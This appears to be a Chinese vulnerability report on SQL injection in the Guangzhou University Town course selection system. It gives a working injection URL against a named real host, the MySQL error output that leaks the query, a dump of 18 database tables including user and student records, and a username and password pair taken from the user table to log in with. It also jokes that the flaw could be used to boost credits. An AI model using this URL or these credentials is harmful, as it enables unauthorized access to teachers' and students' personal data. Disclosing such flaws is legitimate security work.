广州大学城高校互选课程管理系统sql注入致大量教师学生用户信息_MySQL

广州大学城高校互选课程管理系统sql注入致大量教师学生用户信息泄漏某处过滤不当导致的sql注入，学分刷起来！

访问：
http://unitown.scnu.edu.cn/ShowMTeachPlanList.php?SelectType=coll&Depart_coll=%B9%E3%B6%AB%CD%E2%D3%EF%CD%E2%C3%B3%B4%F3%D1%A7%%27
错误信息：

<code>mySQL 查询错误: SELECT Zhy.DepartID, Zhy.Zhy_Code, Department.Depart_coll, Department.Depart_majorFROM Zhy , Department WHERE Zhy.DepartID = Department.DepartIDAND Department.Depart_coll ='广东外语外贸大学%''<br><br>mySQL 发生错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''广东外语外贸大学%''' at line 1<br>mySQL 错误代码: 1064<br>时间: Sunday 30th 2014f March 2014 11:34:48 AM</code>

<code>[18 tables]<br>+---------------------------------------+<br>| News|<br>| user|<br>| course|<br>| course_recepter |<br>| course_resourse |<br>| coursevaild |<br>| department|<br>| error |<br>| excellentcourse |<br>| majorcode |<br>| mcteachplan |<br>| mcteachplanarrangement|<br>| noteinfo|<br>| receive |<br>| selcourse |<br>| studentinfo |<br>| systemrecord|<br>| zhy |<br>+---------------------------------------+</code>

首页就有登陆入口，整一条user记录，登陆一下
lihh pwd:lihh